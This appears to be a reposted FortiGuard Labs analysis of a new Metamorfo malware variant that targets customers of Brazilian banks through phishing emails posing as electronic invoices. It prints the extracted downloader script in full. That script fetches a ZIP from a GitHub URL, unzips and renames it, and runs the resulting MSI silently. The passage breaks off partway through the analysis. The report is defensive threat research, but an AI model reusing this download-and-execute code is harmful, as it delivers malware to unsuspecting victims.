{"id":17455,"date":"2020-01-15T11:40:30","date_gmt":"2020-01-15T19:40:30","guid":{"rendered":"http:\/\/www.palada.net\/index.php\/2020\/01\/15\/news-11191\/"},"modified":"2020-01-15T11:40:30","modified_gmt":"2020-01-15T19:40:30","slug":"news-11191","status":"publish","type":"post","link":"http:\/\/www.palada.net\/index.php\/2020\/01\/15\/news-11191\/","title":{"rendered":"Deep Analysis of New Metamorfo Variant Targeting Customers of Brazilian Financial Organizations"},"content":{"rendered":"<div class=\"aem-Grid aem-Grid--12 aem-Grid--default--12\">\n<div class=\"cmp cmp-text aem-GridColumn aem-GridColumn--default--12\">\n<p><b><i>A FortiGuard Labs Threat Analysis Report<\/i><\/b><\/p>\n<p>FortiGuard Labs recently captured a suspicious sample from a phishing email. After a quick analysis, I determined that this was a new variant of the Metamorfo malware, which was known for collecting data from the customers of Brazilian financial organizations.<\/p>\n<p>In this analysis, I will elaborate what this new variant of Metamorfo does and what data it collects from a victim\u2019s machine, as well as how it communicates with its command and control (C&amp;C) server.<\/p>\n<h2>Spreading in a Phishing Email<\/h2>\n<p>The email content was in Portuguese, which is the official language of Brazil. The email content is translated into English in Figure 1. It was disguised as a notice asking the victim to download an Electronic Invoice (NF). When moving a mouse over the blue download button, the file download URL is shown in the status bar.<\/p>\n<\/p><\/div>\n<div class=\"cmp cmp-image aem-GridColumn--default--none aem-GridColumn--default--9 aem-GridColumn aem-GridColumn--offset--default--1\">               <noscript data-cmp-image=\"{&#34;smartImages&#34;:[],&#34;smartSizes&#34;:[],&#34;lazyEnabled&#34;:true}\">             <img decoding=\"async\" src=\"\/blog\/threat-research\/analysis-metamorfo-variant-targets-financial-organizations\/_jcr_content\/root\/responsivegrid\/image_1866256683.img.png\/1579115666486\/email-content1-copy.png\" alt=\"Figure 1. Phishing Email Content\"\/>         <\/noscript>          <span class=\"cmp-image--title\">Figure 1. Phishing Email Content<\/span>         <\/div>\n<div class=\"cmp cmp-text aem-GridColumn aem-GridColumn--default--12\">\n<p>The downloaded file was not an electronic invoice, but a ZIP file with the MSI file name \u201cXlsPlan_Visualize.msi\u201d.<\/p>\n<p>As we know, an MSI file is an installer\u00a0package file used for the installation, storage, and removal of programs by Windows OS. However, MSI file is not an executable file like an EXE file, whose content is saved in <a href=\"https:\/\/en.wikipedia.org\/wiki\/Object_Linking_and_Embedding\">OLE document format<\/a>. Instead, double clicking on any MSI file causes the Windows system to call MsiExec.exe to process it.<\/p>\n<h2>Executing VBS code to download another MSI<\/h2>\n<p>There were forty-eight streams (similar to files) inside this \u201cXlsPlan_Visualize.msi\u201d file. Figure 2 shows a part of those streams. However, this MSI file is not the final malware body, but simply a malware downloader. Let\u2019s go inside the file to see how it works.<\/p>\n<\/p><\/div>\n<div class=\"cmp cmp-image aem-GridColumn aem-GridColumn--default--12\">               <noscript data-cmp-image=\"{&#34;smartImages&#34;:[],&#34;smartSizes&#34;:[],&#34;lazyEnabled&#34;:true}\">             <img decoding=\"async\" src=\"\/blog\/threat-research\/analysis-metamorfo-variant-targets-financial-organizations\/_jcr_content\/root\/responsivegrid\/image_1381398213.img.png\/1578613863015\/metamorfo-two.png\" alt=\"Figure 2. Part of the streams inside XlsPlan_Visualize.msi\"\/>         <\/noscript>          <span class=\"cmp-image--title\">Figure 2. Part of the streams inside XlsPlan_Visualize.msi<\/span>         <\/div>\n<div class=\"cmp cmp-text aem-GridColumn aem-GridColumn--default--12\">\n<p>The \u201c!_StringData\u201d stream contains a piece of VBS code that is executed by MsiExec.exe to download another malicious file. This code was mixed with a lot of garbage strings, as you can see in Figure 3.\u00a0<\/p>\n<\/p><\/div>\n<div class=\"cmp cmp-image aem-GridColumn aem-GridColumn--default--12\">               <noscript data-cmp-image=\"{&#34;smartImages&#34;:[],&#34;smartSizes&#34;:[],&#34;lazyEnabled&#34;:true}\">             <img decoding=\"async\" src=\"\/blog\/threat-research\/analysis-metamorfo-variant-targets-financial-organizations\/_jcr_content\/root\/responsivegrid\/image_662188271.img.png\/1578614393487\/metamorfo-three.png\" alt=\"Figure 3. VBS code in !_StringData stream\"\/>         <\/noscript>          <span class=\"cmp-image--title\">Figure 3. VBS code in !_StringData stream<\/span>         <\/div>\n<div class=\"cmp cmp-text aem-GridColumn aem-GridColumn--default--12\">\n<p>The highlighted section is part of the VBS code, which has been extracted and listed below:<\/p>\n<\/p><\/div>\n<div class=\"raw-import aem-GridColumn aem-GridColumn--default--12\">\n<div class=\"text-container\">\n<p style=\"margin: 0in 0in 12pt; line-height: 115%; font-size: 11pt; font-family: Calibri, sans-serif;\"><em><span style=\"line-height: 115%; font-family: 'Times New Roman', serif; color: black; background: #D9D9D9;\">FJSJSKDFSJDFKJS = &#8220;<\/span><\/em><strong><em><span style=\"line-height: 115%; font-family: 'Times New Roman', serif; color: red; background: #D9D9D9;\">https:\/\/raw.githubusercontent.com\/edx23\/X435\/master\/img.zip<\/span><\/em><\/strong><em><span style=\"line-height: 115%; font-family: 'Times New Roman', serif; color: black; background: #D9D9D9;\">&#8220;;<\/span><\/em><\/p>\n<p style=\"margin: 0in 0in 12pt; line-height: 115%; font-size: 11pt; font-family: Calibri, sans-serif;\"><em><span style=\"line-height: 115%; font-family: 'Times New Roman', serif; color: black; background: #D9D9D9;\">JFJDKDAKSS = &#8220;&#8221;;<\/span><\/em><\/p>\n<p style=\"margin: 0in 0in 12pt; line-height: 115%; font-size: 11pt; font-family: Calibri, sans-serif;\"><em><span style=\"line-height: 115%; font-family: 'Times New Roman', serif; color: black; background: #D9D9D9;\">ppasta = &#8220;\\Downloads&#8221;;<\/span><\/em><\/p>\n<p style=\"margin: 0in 0in 12pt; line-height: 115%; font-size: 11pt; font-family: Calibri, sans-serif;\"><em><span style=\"line-height: 115%; font-family: 'Times New Roman', serif; color: black; background: #D9D9D9;\">JJJFDNMCNNN = &#8221; @ p u b l i c @ &#8221; + ppasta;<\/span><\/em><\/p>\n<p style=\"margin: 0in 0in 12pt; line-height: 115%; font-size: 11pt; font-family: Calibri, sans-serif;\"><em><span style=\"line-height: 115%; font-family: 'Times New Roman', serif; color: black; background: #D9D9D9;\">JJKKSMNfF = &#8220;<\/span><\/em><strong><em><span style=\"line-height: 115%; font-family: 'Times New Roman', serif; color: red; background: #D9D9D9;\">KJFLDKRE<\/span><\/em><\/strong><em><span style=\"line-height: 115%; font-family: 'Times New Roman', serif; color: black; background: #D9D9D9;\">&#8220;;<\/span><\/em><\/p>\n<p style=\"margin: 0in 0in 12pt; line-height: 115%; font-size: 11pt; font-family: Calibri, sans-serif;\"><em><span style=\"line-height: 115%; font-family: 'Times New Roman', serif; color: black; background: #D9D9D9;\">JFJKNNDNDFJKDD = &#8220;wscript.shell&#8221;;<\/span><\/em><\/p>\n<p style=\"margin: 0in 0in 12pt; line-height: 115%; font-size: 11pt; font-family: Calibri, sans-serif;\"><em><span style=\"line-height: 115%; font-family: 'Times New Roman', serif; color: black; background: #D9D9D9;\">JMDNNSKDJFFF = &#8220;Shell.Application&#8221;<\/span><\/em><\/p>\n<p style=\"margin: 0in 0in 12pt; line-height: 115%; font-size: 11pt; font-family: Calibri, sans-serif;\"><em><span style=\"line-height: 115%; font-family: 'Times New Roman', serif; color: black; background: #D9D9D9;\">RURIEJNDDS = &#8220;Msxml2.XMLHTTP&#8221;;<\/span><\/em><\/p>\n<p style=\"margin: 0in 0in 12pt; line-height: 115%; font-size: 11pt; font-family: Calibri, sans-serif;\"><em><span style=\"line-height: 115%; font-family: 'Times New Roman', serif; color: black; background: #D9D9D9;\">JDNNNSC = &#8220;scripting.filesystemobject&#8221;;<\/span><\/em><\/p>\n<p style=\"margin: 0in 0in 12pt; line-height: 115%; font-size: 11pt; font-family: Calibri, sans-serif;\"><em><span style=\"line-height: 115%; font-family: 'Times New Roman', serif; color: black; background: #D9D9D9;\">JNDDSFCCD = &#8220;<\/span><\/em><strong><em><span style=\"line-height: 115%; font-family: 'Times New Roman', serif; color: red; background: #D9D9D9;\">GET<\/span><\/em><\/strong><em><span style=\"line-height: 115%; font-family: 'Times New Roman', serif; color: black; background: #D9D9D9;\">&#8220;;<\/span><\/em><\/p>\n<p style=\"margin: 0in 0in 12pt; line-height: 115%; font-size: 11pt; font-family: Calibri, sans-serif;\"><em><span style=\"line-height: 115%; font-family: 'Times New Roman', serif; color: black; background: #D9D9D9;\">NNCDSXXX = &#8220;Adodb.Stream&#8221;;<\/span><\/em><\/p>\n<p style=\"margin: 0in 0in 12pt; line-height: 115%; font-size: 11pt; font-family: Calibri, sans-serif;\"><em><span style=\"line-height: 115%; font-family: 'Times New Roman', serif; color: black; background: #D9D9D9;\">JJDALV = &#8220;img.jpg&#8221;;<\/span><\/em><\/p>\n<p style=\"margin: 0in 0in 12pt; line-height: 115%; font-size: 11pt; font-family: Calibri, sans-serif;\"><em><span style=\"line-height: 115%; font-family: 'Times New Roman', serif; color: black; background: #D9D9D9;\">NXXXDSF = &#8220;zip&#8221;;<\/span><\/em><\/p>\n<p style=\"margin: 0in 0in 12pt; line-height: 115%; font-size: 11pt; font-family: Calibri, sans-serif;\"><em><span style=\"line-height: 115%; font-family: 'Times New Roman', serif; color: black; background: #D9D9D9;\">JJJFDNMCNNN = JJJFDNMCNNN.replace(\/@\/g, &#8220;%&#8221;);<\/span><\/em><\/p>\n<p style=\"margin: 0in 0in 12pt; line-height: 115%; font-size: 11pt; font-family: Calibri, sans-serif;\"><em><span style=\"line-height: 115%; font-family: 'Times New Roman', serif; color: black; background: #D9D9D9;\">JJJFDNMCNNN = JJJFDNMCNNN.replace(\/ \/g, &#8220;&#8221;);<\/span><\/em><\/p>\n<p style=\"margin: 0in 0in 12pt; line-height: 115%; font-size: 11pt; font-family: Calibri, sans-serif;\"><em><span style=\"line-height: 115%; font-family: 'Times New Roman', serif; color: black; background: #D9D9D9;\">KDJNNNDM = new ActiveXObject(JFJKNNDNDFJKDD);<\/span><\/em><\/p>\n<p style=\"margin: 0in 0in 12pt; line-height: 115%; font-size: 11pt; font-family: Calibri, sans-serif;\"><em><span style=\"line-height: 115%; font-family: 'Times New Roman', serif; color: black; background: #D9D9D9;\">JHDHDNSKKK = new ActiveXObject(JDNNNSC);<\/span><\/em><\/p>\n<p style=\"margin: 0in 0in 12pt; line-height: 115%; font-size: 11pt; font-family: Calibri, sans-serif;\"><em><span style=\"line-height: 115%; font-family: 'Times New Roman', serif; color: black; background: #D9D9D9;\">JDNFMDNSKKJDDDD = new ActiveXObject(JMDNNSKDJFFF);<\/span><\/em><\/p>\n<p style=\"margin: 0in 0in 12pt; line-height: 115%; font-size: 11pt; font-family: Calibri, sans-serif;\"><em><span style=\"line-height: 115%; font-family: 'Times New Roman', serif; color: black; background: #D9D9D9;\">JJJFDNMCNNN = KDJNNNDM.expandenvironmentstrings(JJJFDNMCNNN) + &#8220;\\&#8221;;<\/span><\/em><\/p>\n<p style=\"margin: 0in 0in 12pt; line-height: 115%; font-size: 11pt; font-family: Calibri, sans-serif;\"><em><span style=\"line-height: 115%; font-family: 'Times New Roman', serif; color: black; background: #D9D9D9;\">NNNNDFSG = JJKKSMNfF + &#8220;_&#8221;;<\/span><\/em><\/p>\n<p style=\"margin: 0in 0in 12pt; line-height: 115%; font-size: 11pt; font-family: Calibri, sans-serif;\"><em><span style=\"line-height: 115%; font-family: 'Times New Roman', serif; color: black; background: #D9D9D9;\">VJJKRRIEO = JJKKSMNfF;<\/span><\/em><\/p>\n<p style=\"margin: 0in 0in 12pt; line-height: 115%; font-size: 11pt; font-family: Calibri, sans-serif;\"><em><span style=\"line-height: 115%; font-family: 'Times New Roman', serif; color: black; background: #D9D9D9;\">VJJKRRIEO = VJJKRRIEO.replace(\/ \/g, &#8220;&#8221;);<\/span><\/em><\/p>\n<p style=\"margin: 0in 0in 12pt; line-height: 115%; font-size: 11pt; font-family: Calibri, sans-serif;\"><em><span style=\"line-height: 115%; font-family: 'Times New Roman', serif; color: black; background: #D9D9D9;\">FJSJSKDFSJDFKJS = FJSJSKDFSJDFKJS.replace(\/qrzck\/g, &#8220;&#8221;);<\/span><\/em><\/p>\n<p style=\"margin: 0in 0in 12pt; line-height: 115%; font-size: 11pt; font-family: Calibri, sans-serif;\"><em><span style=\"line-height: 115%; font-family: 'Times New Roman', serif; color: black; background: #D9D9D9;\">JFJDKDAKSS = JFJDKDAKSS.replace(\/qrzck\/g, &#8220;&#8221;);<\/span><\/em><\/p>\n<p style=\"margin: 0in 0in 12pt; line-height: 115%; font-size: 11pt; font-family: Calibri, sans-serif;\"><em><span style=\"line-height: 115%; font-family: 'Times New Roman', serif; color: black; background: #D9D9D9;\">JQOVID = NNNNDFSG + VJJKRRIEO + &#8220;_&#8221; + JJKKSMNfF + &#8220;.&#8221; + NXXXDSF;<\/span><\/em><\/p>\n<p style=\"margin: 0in 0in 12pt; line-height: 115%; font-size: 11pt; font-family: Calibri, sans-serif;\"><em><span style=\"line-height: 115%; font-family: 'Times New Roman', serif; color: black; background: #D9D9D9;\">EQMJKG = JQOVID;<\/span><\/em><\/p>\n<p style=\"margin: 0in 0in 12pt; line-height: 115%; font-size: 11pt; font-family: Calibri, sans-serif;\"><em><span style=\"line-height: 115%; font-family: 'Times New Roman', serif; color: black; background: #D9D9D9;\">JJJFDNMCNNN = JJJFDNMCNNN.replace(\/\\\/g, &#8220;@&#8221;);<\/span><\/em><\/p>\n<p style=\"margin: 0in 0in 12pt; line-height: 115%; font-size: 11pt; font-family: Calibri, sans-serif;\"><em><span style=\"line-height: 115%; font-family: 'Times New Roman', serif; color: black; background: #D9D9D9;\">JJJFDNMCNNN = JJJFDNMCNNN.replace(\/@\/g, &#8220;\\&#8221; + &#8220;\\&#8221;);<\/span><\/em><\/p>\n<p style=\"margin: 0in 0in 12pt; line-height: 115%; font-size: 11pt; font-family: Calibri, sans-serif;\"><em><span style=\"line-height: 115%; font-family: 'Times New Roman', serif; background: #D9D9D9;\">&nbsp;<\/span><\/em><\/p>\n<p style=\"margin: 0in 0in 12pt; line-height: 115%; font-size: 11pt; font-family: Calibri, sans-serif;\"><em><span style=\"line-height: 115%; font-family: 'Times New Roman', serif; color: black; background: #D9D9D9;\">function unzip(zipfile, unzipdir) {<\/span><\/em><\/p>\n<p style=\"margin: 0in 0in 12pt; line-height: 115%; font-size: 11pt; font-family: Calibri, sans-serif;\"><em><span style=\"line-height: 115%; font-family: 'Times New Roman', serif; color: black; background: #D9D9D9;\">&nbsp; try {<\/span><\/em><\/p>\n<p style=\"margin: 0in 0in 12pt; line-height: 115%; font-size: 11pt; font-family: Calibri, sans-serif;\"><em><span style=\"line-height: 115%; font-family: 'Times New Roman', serif; color: black; background: #D9D9D9;\">&nbsp;&nbsp;&nbsp; var JHDHDNSKKK = new ActiveXObject(JDNNNSC),<\/span><\/em><\/p>\n<p style=\"margin: 0in 0in 12pt; line-height: 115%; font-size: 11pt; font-family: Calibri, sans-serif;\"><em><span style=\"line-height: 115%; font-family: 'Times New Roman', serif; color: black; background: #D9D9D9;\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; JDNFMDNSKKJDDDD = new ActiveXObject(JMDNNSKDJFFF),<\/span><\/em><\/p>\n<p style=\"margin: 0in 0in 12pt; line-height: 115%; font-size: 11pt; font-family: Calibri, sans-serif;\"><em><span style=\"line-height: 115%; font-family: 'Times New Roman', serif; color: black; background: #D9D9D9;\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; dst, zip;<\/span><\/em><\/p>\n<p style=\"margin: 0in 0in 12pt; line-height: 115%; font-size: 11pt; font-family: Calibri, sans-serif;\"><em><span style=\"line-height: 115%; font-family: 'Times New Roman', serif; color: black; background: #D9D9D9;\">&nbsp;&nbsp;&nbsp; if (!unzipdir) {&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; unzipdir = &#8216;.&#8217;;&nbsp;&nbsp;&nbsp; }<\/span><\/em><\/p>\n<p style=\"margin: 0in 0in 12pt; line-height: 115%; font-size: 11pt; font-family: Calibri, sans-serif;\"><em><span style=\"line-height: 115%; font-family: 'Times New Roman', serif; color: black; background: #D9D9D9;\">&nbsp;&nbsp;&nbsp; if (!JHDHDNSKKK.FolderExists(unzipdir)) &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><\/em><\/p>\n<p style=\"margin: 0in 0in 12pt; line-height: 115%; font-size: 11pt; font-family: Calibri, sans-serif;\"><em><span style=\"line-height: 115%; font-family: 'Times New Roman', serif; color: black; background: #D9D9D9;\">&nbsp;&nbsp;&nbsp;&nbsp; &nbsp;{JHDHDNSKKK.CreateFolder(unzipdir);}<\/span><\/em><\/p>\n<p style=\"margin: 0in 0in 12pt; line-height: 115%; font-size: 11pt; font-family: Calibri, sans-serif;\"><em><span style=\"line-height: 115%; font-family: 'Times New Roman', serif; color: black; background: #D9D9D9;\">&nbsp;&nbsp;&nbsp; dst = JDNFMDNSKKJDDDD.NameSpace(JHDHDNSKKK.getFolder(unzipdir).Path);<\/span><\/em><\/p>\n<p style=\"margin: 0in 0in 12pt; line-height: 115%; font-size: 11pt; font-family: Calibri, sans-serif;\"><em><span style=\"line-height: 115%; font-family: 'Times New Roman', serif; color: black; background: #D9D9D9;\">&nbsp;&nbsp;&nbsp; zip = JDNFMDNSKKJDDDD.NameSpace(JHDHDNSKKK.getFile(zipfile).Path);<\/span><\/em><\/p>\n<p style=\"margin: 0in 0in 12pt; line-height: 115%; font-size: 11pt; font-family: Calibri, sans-serif;\"><em><span style=\"line-height: 115%; font-family: 'Times New Roman', serif; color: black; background: #D9D9D9;\">&nbsp;&nbsp;&nbsp; if (JHDHDNSKKK.FileExists(zipfile)) {<\/span><\/em><\/p>\n<p style=\"margin: 0in 0in 12pt; line-height: 115%; font-size: 11pt; font-family: Calibri, sans-serif;\"><em><span style=\"line-height: 115%; font-family: 'Times New Roman', serif; color: black; background: #D9D9D9;\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; dst.CopyHere(zip.Items(), 4 + 16);<\/span><\/em><\/p>\n<p style=\"margin: 0in 0in 12pt; line-height: 115%; font-size: 11pt; font-family: Calibri, sans-serif;\"><em><span style=\"line-height: 115%; font-family: 'Times New Roman', serif; color: black; background: #D9D9D9;\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; JHDHDNSKKK.DeleteFile(zipfile);<\/span><\/em><\/p>\n<p style=\"margin: 0in 0in 12pt; line-height: 115%; font-size: 11pt; font-family: Calibri, sans-serif;\"><em><span style=\"line-height: 115%; font-family: 'Times New Roman', serif; color: black; background: #D9D9D9;\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <\/span><\/em><strong><em><span style=\"line-height: 115%; font-family: 'Times New Roman', serif; color: red; background: #D9D9D9;\">JHDHDNSKKK.MoveFile(unzipdir + &#8220;\\&#8221; + JJDALV, unzipdir + &#8220;\\&#8221; + JJKKSMNfF + &#8220;.msi&#8221;);<\/span><\/em><\/strong><\/p>\n<p style=\"margin: 0in 0in 12pt; line-height: 115%; font-size: 11pt; font-family: Calibri, sans-serif;\"><strong><em><span style=\"line-height: 115%; font-family: 'Times New Roman', serif; color: red; background: #D9D9D9;\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; KDJNNNDM.Run(unzipdir + &#8220;\\&#8221; + JJKKSMNfF + &#8220;.msi \/quiet&#8221;, 0, false);<\/span><\/em><\/strong><\/p>\n<p style=\"margin: 0in 0in 12pt; line-height: 115%; font-size: 11pt; font-family: Calibri, sans-serif;\"><em><span style=\"line-height: 115%; font-family: 'Times New Roman', serif; color: black; background: #D9D9D9;\">&nbsp;&nbsp;&nbsp; }<\/span><\/em><\/p>\n<p style=\"margin: 0in 0in 12pt; line-height: 115%; font-size: 11pt; font-family: Calibri, sans-serif;\"><em><span style=\"line-height: 115%; font-family: 'Times New Roman', serif; color: black; background: #D9D9D9;\">&nbsp; }catch (e) { }<\/span><\/em><\/p>\n<p style=\"margin: 0in 0in 12pt; line-height: 115%; font-size: 11pt; font-family: Calibri, sans-serif;\"><em><span style=\"line-height: 115%; font-family: 'Times New Roman', serif; color: black; background: #D9D9D9;\">}<\/span><\/em><\/p>\n<p style=\"margin: 0in 0in 12pt; line-height: 115%; font-size: 11pt; font-family: Calibri, sans-serif;\"><em><span style=\"line-height: 115%; font-family: 'Times New Roman', serif; background: #D9D9D9;\">&nbsp;<\/span><\/em><\/p>\n<p style=\"margin: 0in 0in 12pt; line-height: 115%; font-size: 11pt; font-family: Calibri, sans-serif;\"><em><span style=\"line-height: 115%; font-family: 'Times New Roman', serif; color: black; background: #D9D9D9;\">try {<\/span><\/em><\/p>\n<p style=\"margin: 0in 0in 12pt; line-height: 115%; font-size: 11pt; font-family: Calibri, sans-serif;\"><em><span style=\"line-height: 115%; font-family: 'Times New Roman', serif; color: black; background: #D9D9D9;\">&nbsp; OOOOJBJKDDS = new ActiveXObject(RURIEJNDDS);<\/span><\/em><\/p>\n<p style=\"margin: 0in 0in 12pt; line-height: 115%; font-size: 11pt; font-family: Calibri, sans-serif;\"><em><span style=\"line-height: 115%; font-family: 'Times New Roman', serif; color: black; background: #D9D9D9;\">&nbsp; OOOOJBJKDDS.<\/span><\/em><strong><em><span style=\"line-height: 115%; font-family: 'Times New Roman', serif; color: red; background: #D9D9D9;\">open<\/span><\/em><\/strong><em><span style=\"line-height: 115%; font-family: 'Times New Roman', serif; color: black; background: #D9D9D9;\">(JNDDSFCCD, FJSJSKDFSJDFKJS + JFJDKDAKSS, false);<\/span><\/em><\/p>\n<p style=\"margin: 0in 0in 12pt; line-height: 115%; font-size: 11pt; font-family: Calibri, sans-serif;\"><em><span style=\"line-height: 115%; font-family: 'Times New Roman', serif; color: black; background: #D9D9D9;\">&nbsp; OOOOJBJKDDS.<\/span><\/em><strong><em><span style=\"line-height: 115%; font-family: 'Times New Roman', serif; color: red; background: #D9D9D9;\">send<\/span><\/em><\/strong><em><span style=\"line-height: 115%; font-family: 'Times New Roman', serif; color: black; background: #D9D9D9;\">();<\/span><\/em><\/p>\n<p style=\"margin: 0in 0in 12pt; line-height: 115%; font-size: 11pt; font-family: Calibri, sans-serif;\"><em><span style=\"line-height: 115%; font-family: 'Times New Roman', serif; color: black; background: #D9D9D9;\">}catch (e) {}<\/span><\/em><\/p>\n<p style=\"margin: 0in 0in 12pt; line-height: 115%; font-size: 11pt; font-family: Calibri, sans-serif;\"><em><span style=\"line-height: 115%; font-family: 'Times New Roman', serif; background: #D9D9D9;\">&nbsp;<\/span><\/em><\/p>\n<p style=\"margin: 0in 0in 12pt; line-height: 115%; font-size: 11pt; font-family: Calibri, sans-serif;\"><em><span style=\"line-height: 115%; font-family: 'Times New Roman', serif; color: black; background: #D9D9D9;\">if (OOOOJBJKDDS.status == 200) {<\/span><\/em><\/p>\n<p style=\"margin: 0in 0in 12pt; line-height: 115%; font-size: 11pt; font-family: Calibri, sans-serif;\"><em><span style=\"line-height: 115%; font-family: 'Times New Roman', serif; color: black; background: #D9D9D9;\">&nbsp; try {<\/span><\/em><\/p>\n<p style=\"margin: 0in 0in 12pt; line-height: 115%; font-size: 11pt; font-family: Calibri, sans-serif;\"><em><span style=\"line-height: 115%; font-family: 'Times New Roman', serif; color: black; background: #D9D9D9;\">&nbsp;&nbsp;&nbsp; var UHJEERESC = new ActiveXObject(NNCDSXXX);<\/span><\/em><\/p>\n<p style=\"margin: 0in 0in 12pt; line-height: 115%; font-size: 11pt; font-family: Calibri, sans-serif;\"><em><span style=\"line-height: 115%; font-family: 'Times New Roman', serif; color: black; background: #D9D9D9;\">&nbsp;&nbsp;&nbsp; UHJEERESC.open();<\/span><\/em><\/p>\n<p style=\"margin: 0in 0in 12pt; line-height: 115%; font-size: 11pt; font-family: Calibri, sans-serif;\"><em><span style=\"line-height: 115%; font-family: 'Times New Roman', serif; color: black; background: #D9D9D9;\">&nbsp;&nbsp;&nbsp; UHJEERESC.type = 1;<\/span><\/em><\/p>\n<p style=\"margin: 0in 0in 12pt; line-height: 115%; font-size: 11pt; font-family: Calibri, sans-serif;\"><em><span style=\"line-height: 115%; font-family: 'Times New Roman', serif; color: black; background: #D9D9D9;\">&nbsp;&nbsp;&nbsp; UHJEERESC.<strong>write<\/strong>(OOOOJBJKDDS.responseBody);<\/span><\/em><\/p>\n<p style=\"margin: 0in 0in 12pt; line-height: 115%; font-size: 11pt; font-family: Calibri, sans-serif;\"><em><span style=\"line-height: 115%; font-family: 'Times New Roman', serif; color: black; background: #D9D9D9;\">&nbsp;&nbsp;&nbsp; UHJEERESC.Position = 0;<\/span><\/em><\/p>\n<p style=\"margin: 0in 0in 12pt; line-height: 115%; font-size: 11pt; font-family: Calibri, sans-serif;\"><em><span style=\"line-height: 115%; font-family: 'Times New Roman', serif; color: black; background: #D9D9D9;\">&nbsp;&nbsp;&nbsp; UHJEERESC.<\/span><\/em><strong><em><span style=\"line-height: 115%; font-family: 'Times New Roman', serif; color: red; background: #D9D9D9;\">saveToFile<\/span><\/em><\/strong><em><span style=\"line-height: 115%; font-family: 'Times New Roman', serif; color: black; background: #D9D9D9;\">(JJJFDNMCNNN + JQOVID, 2);<\/span><\/em><\/p>\n<p style=\"margin: 0in 0in 12pt; line-height: 115%; font-size: 11pt; font-family: Calibri, sans-serif;\"><em><span style=\"line-height: 115%; font-family: 'Times New Roman', serif; color: black; background: #D9D9D9;\">&nbsp;&nbsp;&nbsp; UHJEERESC.close();<\/span><\/em><\/p>\n<p style=\"margin: 0in 0in 12pt; line-height: 115%; font-size: 11pt; font-family: Calibri, sans-serif;\"><em><span style=\"line-height: 115%; font-family: 'Times New Roman', serif; color: black; background: #D9D9D9;\">&nbsp;&nbsp;&nbsp; <\/span><\/em><strong><em><span style=\"line-height: 115%; font-family: 'Times New Roman', serif; color: red; background: #D9D9D9;\">unzip<\/span><\/em><\/strong><em><span style=\"line-height: 115%; font-family: 'Times New Roman', serif; color: black; background: #D9D9D9;\">(JJJFDNMCNNN + JQOVID, JJJFDNMCNNN + JJKKSMNfF);<\/span><\/em><\/p>\n<p style=\"margin: 0in 0in 12pt; line-height: 115%; font-size: 11pt; font-family: Calibri, sans-serif;\"><em><span style=\"line-height: 115%; font-family: 'Times New Roman', serif; color: black; background: #D9D9D9;\">&nbsp; } catch (e) { }<\/span><\/em><\/p>\n<p style=\"margin: 0in 0in 12pt; line-height: 115%; font-size: 11pt; font-family: Calibri, sans-serif;\"><em><span style=\"line-height: 115%; font-family: 'Times New Roman', serif; color: black; background: #D9D9D9;\">}<\/span><\/em><\/p>\n<\/div><\/div>\n<div class=\"cmp cmp-text aem-GridColumn aem-GridColumn--default--12\">\n<p>Going through this VBS code we learn that it downloads the \u201cimg.zip\u201d file from the url \u201chxxps[:]\/\/raw[.]githubusercontent[.]com\/edx23\/X435\/master\/img.zip\u201d, calls the unzip() function to decompress the file into the folder located at \u201c%Public%DownloadsKJFLDKRE\u201d, and then renames the file as \u201cKJFLDKRE.msi\u201d. Finally, it executes this file with the parameter \u201c\/quiet\u201d. The \u201c\/quiet\u201d parameter has the process run in the background with no user interface, so the victim doesn\u2019t notice it.<\/p>\n<h2>Basic Information on KJFLDKRE.msi<\/h2>\n<p>\u201cKJFLDKRE.msi\u201d contains an EXE file split into several parts, each of which is known as a stream. Figure 4 is a screenshot of the content of \u201cKJFLDKRE.msi\u201d. As you can see, the sections in the PE structure were split into several streams, such as \u201cCODE\u201d, \u201cDATA\u201d, and so on.<\/p>\n<\/p><\/div>\n<div class=\"cmp cmp-image aem-GridColumn aem-GridColumn--default--12\">               <noscript data-cmp-image=\"{&#34;smartImages&#34;:[],&#34;smartSizes&#34;:[],&#34;lazyEnabled&#34;:true}\">             <img decoding=\"async\" src=\"\/blog\/threat-research\/analysis-metamorfo-variant-targets-financial-organizations\/_jcr_content\/root\/responsivegrid\/image_1812633029.img.png\/1578614612852\/metamorfo-four.png\" alt=\"Figure 4. Split EXE file as streams in KJFLDKRE.msi\"\/>         <\/noscript>          <span class=\"cmp-image--title\">Figure 4. Split EXE file as streams in KJFLDKRE.msi<\/span>         <\/div>\n<div class=\"cmp cmp-text aem-GridColumn aem-GridColumn--default--12\">\n<p>When this MSI file runs in MsiExec.exe, the PE file (EXE file) is restored into C:WindowsInstallar and then executed. The filename is not fixed. In this case, it is \u201cMSIA1F6.tmp\u201d. Using an analysis tool, I determined that the file was written in Delphi. Figure 5 below shows more detailed information of this \u201cMSIAIF6.tmp\u201d file.<\/p>\n<\/p><\/div>\n<div class=\"cmp cmp-image aem-GridColumn--default--none aem-GridColumn--default--9 aem-GridColumn aem-GridColumn--offset--default--1\">               <noscript data-cmp-image=\"{&#34;smartImages&#34;:[],&#34;smartSizes&#34;:[],&#34;lazyEnabled&#34;:true}\">             <img decoding=\"async\" src=\"\/blog\/threat-research\/analysis-metamorfo-variant-targets-financial-organizations\/_jcr_content\/root\/responsivegrid\/image_165694122.img.png\/1578614657209\/metamorfo-five.png\" alt=\"Figure 5. Screenshot of \u201cMSIAIF6.tmp\u201d in an analysis tool\"\/>         <\/noscript>          <span class=\"cmp-image--title\">Figure 5. Screenshot of \u201cMSIAIF6.tmp\u201d in an analysis tool<\/span>         <\/div>\n<div class=\"cmp cmp-text aem-GridColumn aem-GridColumn--default--12\">\n<h2>Dissecting KJFLDKRE.msi<\/h2>\n<p>\u201cKJFLDKRE.msi\u201d is the real Metamorfo malware, and as mentioned earlier, it runs in the background. In fact, \u201cMSIA1F6.tmp\u201d is extracted from \u201cKJFLDKRE.msi\u201d and executed in a child process of MsiExec.exe. All tasks of the new variant of Metamorfo are 